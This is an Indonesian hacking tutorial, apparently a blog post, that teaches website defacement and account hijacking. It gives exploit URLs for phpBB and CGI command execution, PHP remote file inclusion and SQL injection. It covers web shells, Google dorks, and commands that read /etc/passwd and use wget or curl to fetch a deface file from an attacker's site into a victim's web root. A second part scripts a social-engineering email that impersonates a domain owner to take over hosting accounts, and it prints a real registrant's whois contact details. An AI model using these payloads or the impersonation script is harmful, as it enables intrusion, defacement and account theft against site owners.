MENITIPKAN FILE DI SITUS YANG MEMPUNYAI CELAH KEAMANAN (orang lain mungkin menyebutnya deface)
Hehehe, aneh yah judulnya.... Padahal orang lain mungkin akan lebih suka untuk menyebutnya sebagai deface. Sebenarnya ada sedikit perbedaan antara deface dan menitipkan file, deface adalah mengubah tampilan suatu situs baik halaman utama atau bukan (sifatnya agak sedikit merusak), sedangkan menitipkan file hanya meletakkan file tersendiri di suatu situs tanpa mengubah halaman tertentu dari situs yang disusupi.
OK... saya rasa cukup basa-basinya. Kita langsung masuk ke pembahasan utama.
Ada lumayan banyak langkah yang diperlukan untuk bisa menitipkan file di suatu situs yang mempunyai celah keamanan.
- Pelajari command dasar sistem operasi, baik windows maupun keluarga *nix (Linux, BSD, MacOS, SunOS, Unix, dll)
- Cari dan pelajari bug-bug aplikasi web yang ada..
- Pelajari cara menggunakan search engine (terutama Google).
- Siapkan beberapa file yang mungkin akan digunakan nantinya, lalu simpan di suatu situs (kalo gak mampu beli yaaaa.... buat situs gratisan aja)
- Pelajari cara mencari daftar situs di suatu server (biasanya satu situs bisa terdiri dari banyak situs, bahkan ada yang ratusan)
1. Command dasar sistem operasi
Berikut ini akan saya jelaskan beberapa command dasar dari sistem operasi, baik windows maupun *nix yang mungkin berguna saat menyusup ke suatu sistem nantinya. Untuk mencoba menjalankan command-command dasar tersebut, di windows gunakan DOS prompt, sedangkan di *nix menggunakan sh, bash, bsh dan lain-lain (command line interface). Jika anda pengguna windows dan tetap ingin mencoba command *nix bagaimana ? Coba cari situs-situs yang menyediakan shell gratis, yang bisa dijalankan menggunakan telnet atau putty.
DOS *NIX Keterangan
- dir ls Melihat daftar file di suatu direktori
- ren mv Mengganti nama file
- copy cp Menggandakan file
- del rm Menghapus file atau direktori
- mkdir mkdir Membuat direktori baru
- type cat Melihat isi suatu file
- cd Cd Berpindah direktori
- Pwd Melihat direktori aktif
2. Bug aplikasi web
Ada beberapa jenis bug diantaranya adalah remote command execution, file injection, sql injection.
Contoh :
Phpbb2 remote command executuon:
http://korban.com/viewtopic.php?t=1&highlight=%2527.passthru($HTTP_GET_VARS[cmd]).%2527&cmd=id;pwd;ls –al
Cgi remote command execution
http://korban.com/index.cgi?page=view.txt|id;pwd|
Php file injection
http://korban.com/index.php?file=http://situsmu.com/file_inject.txt?cmd=id;pwd
Asp-MsSQL Sql injection
http://korban.com/index.asp?id=1;update table set field5=’hacked’ where field1=1
Untuk mendapatkan lebih banyak bug-bug aplikasi web, silakan mengunjungi situs-situs keamanan atau situs-situs hacker yang ada.
3. Mengunakan search engine (Google)
Google adalah mesin pencari yang sangat sering digunakan oleh hacker untuk mencari situs-situs yang mempunyai celah keamanan. Ada beberapa option yang bisa ditambahkan pada keyword untuk mempersempit pencarian.
Allinurl:file_manager.php ? mencari situs yang ada file file_manager.php saja
Intitle:hacked ? mencari situs yang title nya ada kata hacked
Masih ada beberapa option lagi yang bisa digunakan. Option-option tersebut bisa digunakan bersamaan agar lingkup hasil pencarian lebih sempit lagi.
Silakan membacanya langsung di google.com atau di situs-situs hacker untuk keterangan lebih lanjut.
4. File yang mungkin dibutuhkan
Berikut ini adalah file-file yang mungkin dibutuhkan untuk melakukan penyusupan.
Phpshell
Phpshell bisa digunakan untuk exploitasi bug file injection atau di simpan di situs yang telah berhasil di susupi untuk menjalankan command shell dari suatu sistem yang menggunakan php sebagai bahasa pemrograman web nya
Cgitelnet
Cgi telnet hanya bisa dijalankan jika sudah tertanam di suatu situs, fungsinya sama dengan phpshell yaitu menjalankan command shell. Untuk situs yang menggunakan Perl.
cmdAsp
sama fungsinya dengan phpshell dan cgi telnet pada situs yang menggunakan asp
5. Mencari nama dan direktori situs lain dalam satu server
Ada beberapa cara yang bisa digunakan (*nix), dengan asumsi bahwa id yang kita dapatkan adalah apache, nobody, httpd, atau www. Jika id yang kita dapatkan adalah nama user maka selamat... kita bisa deface halaman utama.
a. httpd.conf
Cari file httpd.conf, dengan menjalankan perintah locate httpd.conf.
Misalkan hasilnya /etc/httpd/httpd.conf, lihat isinya dengan perintah cat /etc/httpd/httpd.conf
Jika kita beruntung maka dalam file tersebut terdapat daftar nama situs berikut direktori root nya.
Jika tidak ada, gunakan cara lain.
b. /etc/passwd
Kita bisa menggunakan file /etc/passwd untuk meraba keberadaan direktori situs
Caranya, jalankan perintah pwd, misalkan hasilnya /home/telo/public_html
Selanjutnya lihat isi file /etc/passwd dengan command cat /etc/passwd
Lihat isinya, perhatikan semua daftar user yang mengandung kata /home
Misalnya /home/user1, /home/user2
Dari sini kita hanya mendapatkan direktori root dari suatu situs, tetapi belum mengetahui nama situsnya.
Lalu bagaimana cara untuk mengetahui? Cara manual, yaitu dengan melihat-lihat isi dari file-file yg ada di dirrektori situs
tersebut, misalkan cd /home/user1/public_html;cat index.html, cara ini memerlukan sedikit kesabaran J
c. /home
misal hasil pwd /home/telo/public_html.
Jalankan perintah ls /home untuk melihat isi dari direktori /home
Jika ada hsailnya berarti kita cukup beruntung karena kabanyakan server tidak mengijinkan nobody untuk melihat isi direktori tersebut.
Selanjutnya hampir sama dengan bagian b di atas, cara ini juga mirip jika kita mendapatkan hasil pwd seperti /etc/www/vhost/teloganyong.com/httpdocs.
OK, sementara cukup perkenalannya, sekarang kita coba langsung ke kasus yang mendekati nyata. Sebagai gambaran, saya lebih suka jika mendapatkan bug php file injection, maka bug ini sebagai contoh J
http://korban.com/index.php?file=http://situsmu.com/inject.txt? (jangan lupa karakter tanda tanya)
(saya anggap file inject.txt nya berupa satu textbox dan satu tombol submit)
1. Masukkan perintah id;pwd;ls –al
2. perhatikan hasilnya, selanjutnya kita anggap hasilnya id=nobody, pwd=/home/korban/public_html, dan hasil ls –al tidak perlu disebutkan.
3. Cari tempat dimana kita diberi ijin menulis, caranya dengan menjalankan perintah find /home/korban/public_html –perm 777 -type d
4. Jika ada daftar direktori yang muncul dari perintah no 3, berarti kita bisa menulis
5. Misalkan hasilnya /home/korban/public_html/images
6. Masukkan file yang ingin ditanamkan dengan cara menjalankan perintah
cd /home/korban/public_html/images;wget http://situsmu.com/deface.html;ls (misalnya), perintah ls digunakan untuk memeriksa apakah file berhasil di susupkan
7. Jika berhasil maka kita bisa mengakses file tersebut ke http://korban.com/images/deface.html
8. selesai
catatan: untuk perintah memasukkan file, mungkin saja wget tidak ada atau memerlukan option tambahan, silakan mencoba cara lain berikut ini
wget http://situsmu.com/deface.html
wget –o deface.html http://situsmu.com/deface.html
curl –o deface html http://situsmu.com/deface.html
lwp-download http://situsmu.com/deface.html
fetch http://situsmu.com/deface.html
linx http://situsmu.com/deface.html
jika masih tidak berhasil juga silakan menggunakan perintah echo untuk menulis file secara langsung
cd /home/korban/public_html/images;echo tested by telo > telo.html;ls
http://korban.com/images/telo.html
2. Hack Site
Ini hanyalah untuk bahan pelajaran saja dan Untuk menjaga Website Anda dari tindakan - Tindakan yang ada di tulisan saya ini . Saya tidak bertanggung Jawab Jika tulisan saya ini di pakai / disalah gunakan Untuk suatu kejahatan. Social Engenering adalah Suatu Tehnik hacker Untuk Melakukan Suatu Hacking ke Sebuah Target , Di mana Social Engenering ini melakukan Suatu hal yang di mana sang Attacker itu , berpura – pura sebagai sosok orang , yang menjadi Targetnya. ( bingung ya Dengan Penjelasan ini ? :P ) Tehnik Social Engenering tidaklah membutuhkan Suatu keahlian Khusus , Seperti bahasa pemerongraman yang Di gunakan untuk menulis Sebuah Exploit dan Dapat menggunakan berbagai macam Operating System, dan lainnya. Tehnik Social Engenering ini Hanya Menyakinkan Sang Admin jaringan Bahwa kita adalah bener – bener orang Yang Akan Kita Mangsa Tehnik Social Engenering ataupun Psycologi Hacking ini sangatlah banyak Sekali macam Tehnik / cara Melakukannya. Disini saya akan mencoba cara Melakukan Tehnik ini untuk melakukan Mengambil Alih Sebuah WebSite / Over site. Oke deh Let’s Doit Bro : Langkah pertama tentukan Dulu Website yang akan Anda Ambil Alih : Misalnya www.stupid-web.com Sekarang Tahap I ( pertama ) Kita Melakukan Whois terhadap target dimana kita akan mencari tahu Identitas Sitarget, Buka Browser anda dan Masuklah Ke Website saya http://www.neo-doank.co.nr/scan.php [ disini saya mempunyai program Sederhana untuk melaukan Scaning terhadap sebuah Host ataupun Domainname, ]( only Scan .com .net .org .info ), lalu masukkan domain namenya ( www.stupid-web.com )untuk di scan. Lihat Di bawah Contoh hasil Scan terhadap target Contoh Hasil Whois terhadap http://jasakom.com : jasakom.com resolved to 216.177.77.9 DNS Query Results: ; <<>> DiG 9.3.1 <<>> any jasakom.com ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 40282 ;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 3, ADDITIONAL: 3 ;; QUESTION SECTION: ;jasakom.com. IN ANY ;; ANSWER SECTION: jasakom.com. 3591 IN A 216.177.77.9 jasakom.com. 3591 IN NS ns3.discountasp.net. jasakom.com. 3591 IN NS ns1.discountasp.net. jasakom.com. 3591 IN NS ns2.discountasp.net. ;; AUTHORITY SECTION: jasakom.com. 3591 IN NS ns2.discountasp.net. jasakom.com. 3591 IN NS ns3.discountasp.net. jasakom.com. 3591 IN NS ns1.discountasp.net. ;; ADDITIONAL SECTION: ns1.discountasp.net. 172150 IN A 64.79.161.51 ns2.discountasp.net. 172150 IN A 216.177.89.10 ns3.discountasp.net. 172150 IN A 63.110.186.41 ;; Query time: 3872 msec ;; SERVER: 127.0.0.1#53(127.0.0.1) ;; WHEN: Mon May 22 19:32:50 2006 ;; MSG SIZE rcvd: 204 Connecting to whois.arin.net... OrgName: Savvis OrgID: SAVVI-2 Address: 3300 Regency Parkway City: Cary StateProv: NC PostalCode: 27511 Country: US ReferralServer: rwhois://rwhois.savvis.net:4321/ NetRange: 216.177.64.0 - 216.177.95.255 CIDR: 216.177.64.0/19 NetName: SAVVIS NetHandle: NET-216-177-64-0-1 Parent: NET-216-0-0-0-0 NetType: Direct Allocation NameServer: DNS01.SAVVIS.NET NameServer: DNS02.SAVVIS.NET NameServer: DNS03.SAVVIS.NET NameServer: DNS04.SAVVIS.NET Comment: RegDate: Updated: 2004-10-07 OrgAbuseHandle: ABUSE11-ARIN OrgAbuseName: Abuse OrgAbusePhone: +1-877-393-7878 OrgAbuseEmail: abuse@savvis.net OrgNOCHandle: NOC99-ARIN OrgNOCName: Network Operations Center OrgNOCPhone: +1-800-213-5127 OrgNOCEmail: ipnoc@savvis.net OrgTechHandle: UIAA-ARIN OrgTechName: US IP Address Administration OrgTechPhone: +1-800-213-5127 OrgTechEmail: ipadmin@savvis.net # ARIN WHOIS database, last updated 2006-05-21 19:10 # Enter ? for additional hints on searching ARIN's WHOIS database. -------- Hasil Whois Di allwhois.com ------------------------- Registrant: Jasakom Ruth Jasakom Jl. Kebon Kosong Gg. Mantri 3 No:161B Jakarta Pusat, DKI 10620 ID Email: sto2009@yahoo.com Registrar Name....: REGISTER.COM, INC. Registrar Whois...: whois.register.com Registrar Homepage: www.register.com Domain Name: jasakom.com Created on..............: Tue, Jul 11, 2000 Expires on..............: Fri, Jul 11, 2008 Record last updated on..: Wed, Feb 08, 2006 Administrative Contact: Jasakom Administrator Jasakom Jakarta Jakarta, DKI Jakarta - ID Phone: 62-8129221973 Email: sto2009@yahoo.com Technical Contact: Register.Com Domain Registrar 575 8th Avenue 11th Floor New York, NY 10018 US Phone: 1-902-7492701 Email: domain-registrar@register.com DNS Servers: ns2.discountasp.net ns1.discountasp.net Register your domain name at http://www.register.com ----------------END WHOIS----------------------------------------- Di atas kita dapat melihat Identitas Sipemilik Domainname tersebut , di mana kita melihat informasi Mulai dari name, E-mail , Address, Phone … Etc ……………… Itu sudah cukup untuk Kita Melakukan suatu Serangan terhadap identitas Si-Target Sekarang tahap ke II ( kedua ) kita melakukan E-mail terhadap Administrator di mana target Hosting :D . Buka http://www.neo-doank.co.nr/mail/ Disini saya mempunyai E-mail Anonymous Script yg saya tulis Sendiri / Design sendiri . Setelah Anda masuk dan login Di Website Target Kita mengirimkan E-mail ke Administrator Hosting Si- Yang Mempunyai website yang Akan kita hack. ( isi E-mail Anda Sebagai E-mail si Target untuk Mendaftarkan Domain Name-nya Tersebut ) Isi E-mailnya Adalah Sebagai berikut : ---------------------------------------------- Dear, My Name is Mr Bla…Bla… Bla ( Bla = First name dan Last name Si yg mempunyai Domain name yang Akan Kita Hack tadi … anda dapat melihat Setelah hasil Whois ) I’ cannot login to My account, because I’forgot my Login Name And Password , There is Below My Identity wich I’ registered My Domain name to your Hosting Company : ( masukkan Semua hasil Whois tadi Mulai dari First name, last name, Address, city .. zip code dan seterusnya ) Please Send My Login Name and Could You Change my password to : kenatipu-loe , because I’ Wanna manage My Account and Update My Site. Please Change My password As soon As possible, if the Password Has Been Change Please Send login + new password to My Another E-mail ( masukin E-mail yang laen disini ) Regard Nama Sesuai dengan register Account Anda Dapat Mengganti kata – katanya sesuai keinginan Anda , atau bagi anda yg Sudah Mahir berbahasa Inggris , gunakan bahasa anda Sendiri , Jika bahasa saya kurang bagus :P Oke deh , Deskripsi tehnik di Atas Adalah Kita berpura – pura sebagai orang yang mempunyai website yang akan kita Hack, di mana kita meminta sang Admin HostingCompany di tempat Domain name-Nya diregister . Setelah Ada komfirmasi bahwa password telah diganti , anda Dapat login ke target Via Control Panel, FTP ataupun SSH. Happy HACK Bro Tulisan saya ini di Buat berdasarkan pengalaman saya selama ini, dan semua scripts yang ada adalah Buatan saya ….. akan tetapi , Jika Scripts-Nya tidak bekerja , Jangan salahkan saya , karena saya masih belajar tentang PHP, dan Open Socket Di PHP